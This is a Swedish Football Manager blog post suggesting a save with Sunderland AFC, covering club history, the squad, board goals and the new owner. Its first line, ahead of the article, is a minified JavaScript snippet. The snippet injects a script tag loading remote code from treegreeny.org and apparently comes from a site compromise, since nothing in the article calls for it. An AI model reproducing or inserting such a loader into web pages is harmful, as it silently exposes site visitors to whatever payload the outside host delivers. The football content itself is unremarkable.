;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veckans inspiration: Sunderland AFC – FMSweden
Meny Stäng

Veckans inspiration: Sunderland AFC

Denna söndag tänkte jag tipsa om Tobbes gamla klubb: Sunderland Association Football Club. I klubben har även andra svenskar som Jocke Björklund, Janne Eriksson, Sebastian Larsson, Stefan Schwarz och Ola Toivonen spelat. Klubben har tillhört den engelska högstaligan i många år, men ej vunnit sedan andra världskriget bröt ut. I någorlunda modern tid så vann de FA-cupen 1973. “The Black Cats” – som laget kallas – spelar sina hemmamatcher på Stadium of Light med en kapacitet på cirka 50 000 åskådare. Grundade 1879 är de en av landets äldsta föreningar och de spelar sina derbyn mot Newcastle i “Tyne–Wear derby”. Numera spelar Sunderland i tredjeligan League One, efter att ha åkt ut Premier League 2017 och Championship året därefter.

På FM då? Jodå, Sunderland är tippade på andraplats i serien första säsongen, efter Hull City. Således finns det goda chanser för uppflyttning, där topp-6 räcker för playoff. Just playoff är styrelsens mål första säsongen och i cuperna är det inga större krav inledningsvis. Annars är det att spela anfalls- och possessionfotboll samt utveckla egna spelare som gäller från styrelsens håll, vilket bör vara möjligt sett till spelarmaterialet. Faciliteterna lämnar knappt något att önska, med väldigt goda förutsättningar. I England är det som bekant 4-4-2 som gäller, helst med långa bollar. I backlinjen märks främst Bailey Wright till höger samt Tom Flanagan och Jordan Willis i mitten. På mittfältet sticker Aiden McGeady ut och på topp finns den omtalade Will Grigg (som förstås är “on fire). Åldersmässigt finns det tre 34-åringar, men i övrigt befinner sig många i sin peak och det finns således potential att klättra direkt i seriesystemet. Det finns ett visst överflöd av vänsteryttar, där någon kan bytas ut mot en central mittfältare förslagsvis. Annars är det en ganska välbalanserad trupp.

Dessutom är Sunderland aktuella nu, när det snart står klart att den 22-årige miljardären Kyril Louis-Dreyfus blir ny ägare. Hans fars kusin heter Julia och är känd för att ha spelat rollen som Elaine Benes i Seinfeld, bara det är ju mer än tillräckligt att starta en ny save! Kan du fixa utmaningen att nå finrummet igen och kanske till och med nå ut i Europa? Lycka till!

Please wait...

Liknande Inlägg

Lämna ett svar